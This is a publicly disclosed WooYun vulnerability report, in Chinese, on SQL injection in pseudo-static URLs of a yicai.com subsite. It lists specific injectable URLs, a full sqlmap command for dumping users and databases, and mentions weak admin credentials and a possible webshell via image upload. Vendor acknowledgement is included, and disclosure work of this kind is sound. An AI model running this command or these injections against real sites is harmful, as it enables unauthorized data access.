漏洞概要
关注数(24)
关注此漏洞
漏洞标题:第一财经网某站伪静态SQL注入漏洞打包(弱口令进入后台同样存在伪静态注入)
提交时间:2015-12-14 12:10
修复时间:2016-01-25 18:01
公开时间:2016-01-25 18:01
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
Tags标签:
无
漏洞详情
披露状态:
2015-12-14: 细节已通知厂商并且等待厂商处理中
2015-12-14: 厂商已经确认,细节仅向厂商公开
2015-12-24: 细节向核心白帽子及相关领域专家公开
2016-01-03: 细节向普通白帽子公开
2016-01-13: 细节向实习白帽子公开
2016-01-25: 细节向公众公开
简要描述:
多处伪静态注入,后台弱口令,同样也存在伪静态注入!~~~
详细说明:
注入点一:
http://lcbt.yicai.com/yicai/index.php/Home/Index/news/classify/6/pid/130/id/140/p/3.html
classify、pid、id后面伪静态注入
选择的时候选择#3*处,后面的什么users、dbs等等都需要这个才能顺利注入出来
以下需要sqlmap添加参数--no-cast或者--hex,但是最后dump测试的时候,发现用--no-cast才好
sqlmap.py -u "http://lcbt.yicai.com/yicai/index.php/Home/Index/news/classify/6*/pid/130*/id/140*/p/3*.html" --threads 10 --dbms "MySQL" --users --dbs--no-cast
注入点二:
http://lcbt.yicai.com/yicai/index.php/Home/index/about/pid/135.html
还是pid后面的存在伪静态注入,不是所有的pid存在。
http://lcbt.yicai.com/yicai/index.php/Home/index/index1/pid/128*.html
这个就不行
注入点三:
http://lcbt.yicai.com/yicai/index.php/Home/Index/lcbt/pid/129/id/138.html
pid、id后面伪静态注入
管理员弱口令进入后台,你们懂得!~~~什么弱口令
至于得到webshell,就不测试了,有上传图片的地方,增加一个新闻内容,然后上传图片,就不绕上传webshell了!~~~
注入点四:
后台也存在多处伪静态注入。怕搞乱数据,就不测试了!~~~自己排查吧!~~~
漏洞证明:
修复方案:
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:低
漏洞Rank:5
确认时间:2015-12-14 12:53
厂商回复:
已收到信息,非常感谢您的工作。
最新状态:
暂无